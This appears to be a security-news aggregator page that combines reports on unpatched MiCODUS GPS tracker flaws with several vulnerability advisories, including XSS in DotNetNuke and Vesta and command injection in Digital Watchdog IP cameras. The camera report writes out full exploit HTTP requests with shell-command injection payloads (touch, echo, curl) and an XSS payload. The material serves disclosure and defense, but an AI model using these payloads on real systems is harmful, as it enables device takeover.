Broader architectural failings of Chinese vendor potentially puts 1.5m devices at risk

Broader architectural failings of Chinese vendor potentially puts 1.5m devices at risk

A raft of zero-day flaws found in a popular automotive GPS tracking device “could have disastrous and even life-threatening implications”, security researchers warn.

Six as-yet-unpatched vulnerabilities unearthed by BitSight researcher Pedro Umbelino affect the API server, GPS tracker protocol, and web server of the MV720 GPS tracker, which was developed by China-based company MiCODUS.

Successful abuse of the bugs could see attackers “cut fuel to an entire fleet of commercial or emergency vehicles”, use GPS data “to monitor and abruptly stop vehicles on dangerous highways”, or “track individuals or demand ransom payments to return disabled vehicles to working condition”, according to research (PDF) from BitSight.

**Huge attack surface**

According to the cybersecurity firm, the MiCODUS MV720 provides theft protection and fleet management functionality to customers in at least in 169 countries, including a Fortune 50 energy company, a national military in South America, a federal government in Western Europe, a national law enforcement agency in Western Europe, and a nuclear power plant operator.

Alarmingly, BitSight said Umbelino also uncovered security issues associated with the firm’s cloud\-based device management interface for the web, iOS, and Android, a finding which means other MiCODUS GPS tracking models could also be insecure. If MiCODUS’ own figures are accurate, that equates to 1.5 million potentially vulnerable devices worldwide.

DON’T MISS ‘Password extraction risk’ in identity provider Okta disputed

With security patches yet to materialize, BitSight has urged users to “immediately stop using or disable any MiCODUS MV720 GPS trackers until a fix is made available”.

A security advisory from the US Cybersecurity and Infrastructure Security Agency (CISA) said that “no known public exploits specifically target these vulnerabilities” in the MV720 GPS tracker.

**Authentication issues**

Two critical authentication issues in the API server, both notching a CVSS score of 9.8, enable “an attacker to send SMS commands directly to the GPS tracker as if they were coming from the GPS owner’s mobile number”.

One bug relates to a hard-coded master password (CVE-2022-2107) and the other, resulting from improper authentication (CVE-2022-2141), potentially enables manipulator-in-the-middle (MitM) attacks.

The devices and the mobile interface are preconfigured with the default password ‘123456’, which BitSight classed as a high severity (CVSS 8.1) issue, although CISA declined to assign a CVE. “There is no mandatory rule to change the password nor is there any claiming process”, according to BitSight, which found that 94.5% of 1,000 responding device IDs still had the default password.

With the device ID easily predictable and the server seemingly lacking password brute force mitigations such as rate-limiting, attackers can easily access random GPS trackers.

Read more of the latest IoT security news

A high severity (CVSS 7.5) reflected cross-site scripting (XSS) vulnerability affecting the main web server, meanwhile, could enable attackers to “fully compromise the device”.

The main web server also contains a pair of authenticated insecure direct object reference vulnerabilities, tracked as CVE-2022-34150 (CVSS 7.1) and CVE-2022-33944 (CVSS 6.5).

“Having a centralized dashboard to monitor GPS trackers with the ability to enable or disable a vehicle, monitor speed, routes and leverage other features” is as potentially dangerous as it is useful, suggested BitSight.

“Unfortunately, the MiCODUS MV720 lacks basic security protections”, and with only “limited testing, BitSight uncovered a multitude of flaws affecting all components of the GPS tracker ecosystem”.

BitSight said it first disclosed the flaws to the vendor on September 9, 2021, and after responding initially, MiCODUS failed to reply to multiple subsequent requests for updates, both from BitSight and CISA. BitSight published its findings yesterday (July 19).

YOU MIGHT ALSO LIKE Jacuzzi customer details could be exposed by SmartTub web bugs, claims researcher

Zero-day flaws in GPS tracker pose surveillance, fuel cut-off risks to vehicles

DotNetNuke (DNN) 9.9.1 CMS is vulnerable to a Stored Cross-Site Scripting vulnerability in the user profile biography section which allows remote authenticated users to inject arbitrary code via a crafted payload.

July 08, 2022**1\. Vulnerability Properties**

**Title:** Stored Cross-Site Scripting in DotNetNuke  
**CVE ID:** CVE-2021-31858  
**CVSSv3 Base Score:** 5.4 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)  
**Vendor:** DNNSoftware  
**Products:** DotNetNuke  
**Advisory Release Date:** 19-07-2022  
**Advisory URL:** https://labs.integrity.pt/advisories/cve-2021-31858  
**Credits:** Discovery by Bruno Barreirinhas <bb\[at\]integrity.pt>

**2\. Vulnerability Summary**

DotNetNuke CMS is vulnerable to a Stored Cross-Site Scripting vulnerability in the user profile biography section which allows remote authenticated users to inject JavaScript and/or HTML via a crafted payload.  
Any subsequent requests to the attacker’s user profile page will retrieve the malicious content and exploit the vulnerability in the victim’s browser.

**3\. Vulnerable Versions**

*   <= 9.10.2

**4\. Solutions**

Until an official patch is released, it’s recommended that affected users take one of the following actions:

*   Disable User profile page in Settings > Site Behavior > Default Pages > User Profile Page
*   Set user profile visibility mode to Admin Only in Settings > Site Behavior > User Profiles > User Profile Settings
*   Disable user profile Biography field in Settings > Site Behavior > User Profiles > User Profile Fields

**5\. Vulnerability Timeline**

*   28/Apr/21 - Bug reported to DNNSoftware via email (no feedback)
*   26/May/21 - Contacted vendor via GitHub
*   26/May/21 - Bug reported to DNNSoftware via email
*   27/May/21 - Bug verified by DNNSoftware
*   13/Jul/21 - Requested feedback regarding the vulnerability
*   22/Jul/21 - Informed the vendor about the assigned CVE ID (no feedback)
*   20/Sep/21 - Requested feedback regarding the vulnerability
*   23/Dez/21 - Requested feedback regarding the vulnerability
*   05/Jul/22 - Notified the vendor about the disclosure (no feedback)
*   11/Jul/22 - Notified the vendor regarding the vulnerability details (no feedback)
*   19/Jul/22 - Advisory released

**6\. References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31858

CVE-2021-42567 Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.

**Latest Advisories**

*   CVE-2021-31858 Stored Cross-Site Scripting in DotNetNuke
*   CVE-2021-42567 Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
*   CVE-2021-44263 Cross-Site Scripting in Gurock TestRail
*   CVE-2021-41844 Open Redirect in JetEngine Wordpress Plugin
*   CVE-2021-38607 Stored Cross-Site Scripting in JetEngine Wordpress Plugin

**Latest Articles**

*   The Curious Case of Apple iOS IKEv2 VPN On Demand
*   Gmail Android app insecure Network Security Configuration.
*   Reviewing Android Webviews fileAccess attack vectors.
*   Droidstat-X, Android Applications Security Analyser Xmind Generator
*   Uber Hacking: How we found out who you are, where you are and where you went!

© 2022 Integrity Part of Devoteam. All rights reserved.

CVE-2021-31858: CVE-2021-31858 Stored Cross-Site Scripting in DotNetNuke

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a handful of unpatched security vulnerabilities in MiCODUS MV720 Global Positioning System (GPS) trackers outfitted in over 1.5 million vehicles that could lead to remote disruption of critical operations.
"Successful exploitation of these vulnerabilities may allow a remote actor to exploit access and gain control of

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a handful of unpatched security vulnerabilities in MiCODUS MV720 Global Positioning System (GPS) trackers outfitted in over 1.5 million vehicles that could lead to remote disruption of critical operations.

"Successful exploitation of these vulnerabilities may allow a remote actor to exploit access and gain control of the global positioning system tracker," CISA said. "These vulnerabilities could impact access to a vehicle fuel supply, vehicle control, or allow locational surveillance of vehicles in which the device is installed."

Available on sale for $20 and manufactured by the China-based MiCODUS, the company's tracking devices are employed by major organizations in 169 countries spanning aerospace, energy, engineering, government, manufacturing, nuclear power plant, and shipping sectors.

The top countries with the most users include Chile, Australia, Mexico, Ukraine, Russia, Morocco, Venezuela, Brazil, Poland, Italy, Indonesia, Uzbekistan, and South Africa.

The issues, which were identified during the course of a security audit by BitSight, could also be potentially abused to track individuals without their knowledge, disable vehicles, and even pose national security implications in light of the fact that militaries and law enforcement agencies use the trackers for real-time monitoring.

"A nation-state adversary could potentially exploit the tracker's vulnerabilities to gather intelligence on military-related movements including supply routes, regular troop movements, and recurring patrols," BitSight researchers pointed out.

The list of flaws that were disclosed to MiCODUS in September 2021 is below -

*   **CVE-2022-2107** (CVSS score: 9.8) - Use of a hard-coded master password that could enable an unauthenticated attacker to carry out adversary-in-the-middle (AitM) attacks and seize control of the tracker.
*   **CVE-2022-2141** (CVSS score: 9.8) - Broken authentication scheme in the API server that enables an attacker to control all traffic between the GPS tracker and the original server and gain control.
*   **No assigned CVE** (CVSS score: 8.1) - Use of a preconfigured default password "123456" that allows attackers to access any GPS tracker at random.
*   **CVE-2022-2199** (CVSS score: 7.5) - A reflected cross-site scripting (XSS) vulnerability in the web server that could lead to the execution of arbitrary JavaScript code in the web browser.
*   **CVE-2022-34150** (CVSS score: 7.1) - An access control vulnerability stemming from Insecure Direct Object Reference (IDOR) that could result in the exposure of sensitive information.
*   **CVE-2022-33944** (CVSS score: 6.5) - A case of authenticated IDOR vulnerability that could be leveraged to generate Excel reports about device activity.

In a nutshell, the flaws could be weaponized to obtain access to location, routes, fuel cutoff commands as well as the ability to disarm various features such as alarms.

But with no workaround in sight, users of the GPS tracker in question are advised to take steps to minimize exposure or alternatively cease using the devices and disable them altogether until a fix is made available by the company.

"Having a centralized dashboard to monitor GPS trackers with the ability to enable or disable a vehicle, monitor speed, routes and leverage other features is useful to many individuals and organizations," the researchers said. "However, such functionality can introduce serious security risks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Unpatched GPS Tracker Bugs Could Let Attackers Disrupt Vehicles Remotely

JavaMelody is a monitoring tool for JavaEE applications. Versions prior to 1.61.0 are vulnerable to a cross-site scripting (XSS) attack. This issue was patched in version 1.61.0, and users are recommended to upgrade to the latest version. There are no known workarounds.

**Java Melody vulnerable to cross-site scripting**

Critical severity GitHub Reviewed Published Jul 20, 2022 • Updated Jul 20, 2022

GHSA-cqhr-jqvc-qw9p: Java Melody vulnerable to cross-site scripting

Digital Watchdog DW MEGApix IP cameras A7.2.2_20211029 was discovered to contain a command injection vulnerability in the component /admin/vca/license/license_tok.cgi. This vulnerability is exploitable via a crafted POST request.

The following issue was found on DW Spectrum server software ver 4.2.0.32842 Information Disclosure: 1. API call displays internal paths, IPs, OS version and architecture. http://<SERVER IP>:7001/api/moduleInformation All issues below were found on A7.2.2\_20211029 firmware of MegaPix IP Camera by Digital Watchdog. The following issues were found through unauthenticated URLs: Information Disclosure: 1. Web files display internal paths and scripts, software versions (CWE-201) http://192.168.1.80/plugin\_info\_list.xml http://192.168.1.80/plugin/plugin\_web.conf http://192.168.1.80/plugin/port.conf 2. Information disclosure and session hijacking through core log (CWE-201) Step 1. generate 500 error from authenticated by going to 192.168.1.80/cgi-bin/result?msubmenu=event&action Step 2. get core file by going to 192.168.1.80/cgi-bin/core Step 3. Use session token information from error event to log into admin pages The following issues were found through authenticated URLs: 1. Command injection on curltest.cgi web file http://192.168.1.80/cgi-bin/admin/curltest.cgi -injectable on test\[\] parameters smtp\_addr,smtp\_port,sender,receiver,id, and pass POST /cgi-bin/admin/curltest.cgi?smtp HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 299 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fdb55be:74a954dee4e18d4598f921815cfda122", uri="/cgi-bin/admin/curltest.cgi?smtp", response="36f619b490b3f5b6cc381f3c80249f2c", qop=auth, nc=0000007d, cnonce="c0b5e7ad8a3ce8b7" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup\_main.cgi test%5Benabled%5D=1&test%5Bsmtp\_addr%5D=192.168.1.5:444';touch%20./test.txt;curl%20--url%20'http://192.168.1.5&test%5Bssl\_enable%5D=0&test%5Bsmtp\_port%5D=444&test%5Bssl\_port%5D=465&test%5Bid%5D=a&test%5Bpass%5D=a&test%5Bsender%5D=test&test%5Breceiver%5D=test&test%5Btitle%5D=hi&test%5Bmessage%5D=hi 2. Command injection on adacph.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/bia/addacph.cgi -injectable on event, id, pluginname, name, and evt\_id paramaters GET /cgi-bin/admin/vca/bia/addacph.cgi?mod&event=a&id=1&pluginname=;%20echo%20'test'>test.html%20;&name=a&evt\_id=a 3. Command injection on license\_tok.cgi web file (CWE-94) http://192.168.1.80/cgi-bin/admin/vca/license/license\_tok.cgi -injectable on POST guid,license\_value, and plugin\_info parameters POST /cgi-bin/admin/vca/license/license\_tok.cgi?getToken HTTP/1.1 Host: 192.168.1.80 User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: \*/\* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 96 Origin: http://192.168.1.80 Authorization: Digest username="admin", realm="IP Camera", nonce="5fe1c519:e61374f2ea956e03c278894d036fc0ef", uri="/cgi-bin/admin/curltest.cgi?smtp", response="53219d6b6a8afdffb3fbbfd9a17dcf98", qop=auth, nc=0000068c, cnonce="960aed74a9bd1476" Connection: close Referer: http://192.168.1.80/cgi-bin/admin/setup\_main.cgi guid='555 http://127.0.0.1;%20echo 'test'>test.html%20;curl -k -d guid=555'&license\_value='fff' 4. XSS vulnerability in bia\_oneshot.cgi web file (CWE-79) http://192.168.1.80/cgi-bin/admin/vca/bia/bia\_oneshot.cgi?blob=%3Chtml%3E%3Cscript%3Ealert(%27test%27)%3C/script%3E%3C/html%3E -file contents injection allows persistent XSS through blob parameter

CVE-2022-34540: dw_vulns.txt

Vesta v1.0.0-5 was discovered to contain a cross-site scripting (XSS) vulnerability via the body function at /web/api/v1/upload/UploadHandler.php.

Hello,

I would like to report for possible XSS vulnerability.

In file https://github.com/serghey-rodin/vesta/blob/master/web/api/v1/upload/UploadHandler.php

the source in function post

    public function post($print\_response = true) {
        //....
        // the source $\_FILES\[$this->options\['param\_name'\]\]
        $upload = isset($\_FILES\[$this\->options\['param\_name'\]\]) ? $\_FILES\[$this\->options\['param\_name'\]\] : null;
        // ....
        foreach ($upload\['tmp\_name'\] as $index => $value) {
            // $files will have the source which return from handle\_file\_upload
            $files\[\] = $this\->handle\_file\_upload(
                $upload\['tmp\_name'\]\[$index\],
                $file\_name ? $file\_name : $upload\['name'\]\[$index\],
                $size ? $size : $upload\['size'\]\[$index\],
                $upload\['type'\]\[$index\], // The source
                $upload\['error'\]\[$index\],
                $index,
                $content\_range
            );
        }
        //.....
        // call generate\_response and pass the source in the array in $files
        return $this\->generate\_response(
            array($this\->options\['param\_name'\] => $files),
            $print\_response
        );
    }

function handle\_file\_upload

    protected function handle\_file\_upload($uploaded\_file, $name, $size, $type, $error,
        //.....
        // the source in $file->type
        $file\->type = $type;
        //....
        return $file;
    }

function generate\_response

    protected function generate\_response($content, $print\_response = true) {
        if ($print\_response) {
            $json = json\_encode($content);
            //.....
            $this\->body($json);
        }
    }

Finally, the sink in function body

protected function body($str) {
        // the sink
        echo $str;
    }

CVE-2022-36305: Possible XSS Vulnerability · Issue #2252 · serghey-rodin/vesta

IBM Sterling Partner Engagement Manager 6.1.2, 6.2, and Cloud/SasS 22.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 223127.

CVE-2022-22417: IBM Sterling Partner Engagement Manager cross-site scripting CVE-2022-22417 Vulnerability Report

Unauthenticated users can access sensitive web URLs through GET request, which should be restricted to maintenance users only. A malicious attacker could use this sensitive information’s to launch further attacks on the system.

**Reporting a vulnerability**

The SICK PSIRT aims to process every vulnerability with confidentiality and professionalism together with the respective reporters. Neither a non-disclosure agreement (NDA) nor another type of contract is necessary or a requirement for collaboration.

Coordinated vulnerability reports from all members of the security community are greatly appreciated. These include security researchers, universities, CERTs, business partners, authorities, industry associations and suppliers.

Many SICK AG products fulfill important protective functions and are used in critical infrastructures. SICK AG therefore asks for cooperation when dealing with the coordinated disclosure of vulnerabilities and also requests that vulnerability information not be disclosed prematurely.

SICK AG requests that as much information as possible is provided in a report in order to speed up processing. This information should contain the following:

*   **Contact information and availability**
*   **Affected product including model and version number**
*   **Classification of the vulnerability** (buffer overflow, XSS, …)
*   **Detailed description of the vulnerability** (with verification if possible)
*   **Effect of the vulnerability** (if know)
*   **Current level of awareness of the vulnerability** (are there plans to disclose it?)
*   **(Company) affiliation of the reporter** (if reporter is prepared to provide such information)
*   **CVSS score** (if known)

If more information is necessary for the inspection of a vulnerability, the SICK PSIRT will contact the reporter.

If the reporter would like, he/she will be publicly acknowledged after disclosing a new vulnerability.

CVE-2021-32504: The SICK Product Security Incident Response Team (SICK PSIRT)

Ubuntu Security Notice 5522-1 - Several security issues were discovered in WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

    =========================================================================Ubuntu Security Notice USN-5522-1July 18, 2022webkit2gtk vulnerabilities=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:Several security issues were fixed in WebKitGTK.Software Description:- webkit2gtk: Web content engine library for GTK+Details:Several security issues were discovered in WebKitGTK Web and JavaScriptengines. If a user were tricked into viewing a malicious website, aremote attacker could exploit a variety of issues related to web browsersecurity, including cross-site scripting attacks, denial of service attacks,and arbitrary code execution.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS:  libjavascriptcoregtk-4.0-18     2.36.4-0ubuntu0.22.04.1  libjavascriptcoregtk-4.1-0      2.36.4-0ubuntu0.22.04.1  libwebkit2gtk-4.0-37            2.36.4-0ubuntu0.22.04.1  libwebkit2gtk-4.1-0             2.36.4-0ubuntu0.22.04.1Ubuntu 20.04 LTS:  libjavascriptcoregtk-4.0-18     2.36.4-0ubuntu0.20.04.1  libwebkit2gtk-4.0-37            2.36.4-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. After a standard system update you need to restart any applicationsthat use WebKitGTK, such as Epiphany, to make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5522-1  CVE-2022-22677, CVE-2022-26710Package Information:  https://launchpad.net/ubuntu/+source/webkit2gtk/2.36.4-0ubuntu0.22.04.1  https://launchpad.net/ubuntu/+source/webkit2gtk/2.36.4-0ubuntu0.20.04.1

Ubuntu Security Notice USN-5522-1

A GPS device from MiCODUS has six security bugs that could allow attackers to monitor 1.5 million vehicles that use the tracker, or even remotely disable vehicles.

Six vulnerabilities have been found in a GPS tracking device used by businesses to monitor vehicle fleets, and by consumers as an anti-theft device. If exploited, they could allow attackers to widely disrupt fleet operations and track individual vehicles.

That's according to cybersecurity firm BitSight, which stated in a Tuesday advisory that the device, the MiCODUS MV720, has vulnerabilities in both the device and the back-end service. These pave the way for man-in-the-middle (MitM) attacks, authentication bypasses, and location tracking. The vulnerabilities include a hard-coded device password that allows access via SMS requests, and a default password on the API server, BitSight found.

"The exploitation of these vulnerabilities could have disastrous and even life-threatening implications," BitSight states in the report. "For example, an attacker could exploit some of the vulnerabilities to cut fuel to an entire fleet of commercial or emergency vehicles. Or, the attacker could leverage GPS information to monitor and abruptly stop vehicles on dangerous highways."

The vulnerabilities include a hard-coded password that could allow commands to be sent to devices, the ability to use administrator privileges for commands, and a default password of 123456. Flaws of lesser severity include a reflected cross-site scripting (XSS) issue and the ability to directly access parts of the application. Five of the vulnerabilities have been assigned identifiers under the Common Vulnerabilities and Exposures (CVE) program: CVE-2022-2107, CVE-2022-2141, CVE-2022-2199, CVE-2022-34150, and CVE-2022-33944. The default password security weakness was not considered a vulnerability, and so did not get a CVE identifier.

**GPS Bugs Remain Unpatched**

While the company has not observed any signs that the vulnerabilities have been exploited, the Chinese firm that manufacturers the device, MiCODUS, has not responded to attempts at discussing the issues, says Stephen Boyer, co-founder and CTO for BitSight.

BitSight originally contacted MiCODUS about the problems in September 2021, and after an initial request for more information, the company refused subsequent attempts to communicate, according to the firm. MiCODUS did not immediately respond to a request for comment from Dark Reading.

"Unfortunately, the hard-coded password means that the only real remediation strategy is to remove the MV720 device or remove the SIM card from the device," he says. The firm shared the bug information with the Department of Homeland Security, he added, in hopes that it could develop an appropriate remediation strategy.

"IoT devices are full of vulnerabilities, and this will not change going into the future no matter how many of these stories come out," Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. "IoT devices are particularly hard to patch. They should all be auto-patching, but most aren't. Most require end-user interaction, and many times a physical connection."

He added, "If you think it's hard to patch regular software, it's ten times as hard to patch IoT devices. I'm purely guessing here, but I'd speculate that 90% of vulnerable GPS tracking devices will remain vulnerable and exploitable if and when the vendor actually decides to fix them. Hackers love those odds."

**IoT: Still No Security by Design, Widespread Threat**

The vulnerabilities underscore the risks posed by Internet of Things (IoT) devices that have not benefited from adequate attention to security design and audits. Connected devices typically have less security, but are distributed throughout many companies' infrastructure and handle physical processes — such as entry access and power control — unlike traditional information technology. 

Concerned with the lack of security, the US government has established requirements for IoT device security.

    

MiCODUS GPS trackers are used by businesses and individuals in 169 countries. Source: BitSight

IoT devices often are also far more widespread than most business users recognize. As shown by the BitSight research, for example, GPS devices in general are used in vehicles belonging to at least five Fortune 50 companies, as well as energy utilities and governments in the Middle East, Europe, and North America.  

BitSight could not determine the prevalence of the MiCODUS MV720 specifically, but noted that MiCODUS claims that 1.5 million devices are used globally. In addition, BitSight saw nearly 2.4 million connections to the MiCODUS API server from 169 countries worldwide. The MiCODUS MV720 is a basic model sold for $20 online, but other models could account for some, or even most, of the IoT manufacturer's installed base.  

The BitSight report notes that two broad use cases exist for the devices. In some countries, data suggests that the devices are used to manage fleets of vehicles. However, in other countries, the large number of individual connections per capita suggests that individuals are using the devices for anti-theft applications.

"Indonesia has many unique IP addresses communicating with the MiCODUS server, but mostly in the GPS tracker port," BitSight states in the advisory. "This may suggest there are a small number of users with a high number of devices, which is typical in a fleet-management scenario. By comparison, Mexico has a very high number of connections to the web and mobile ports, which could indicate individuals are using the GPS tracker as an anti-theft device."

Mexico, Russia, and Uzbekistan are the countries with the most individual users, the company estimates. Russia, Morocco, and Chile appear to have the greatest number of actual devices.

Tag

#xss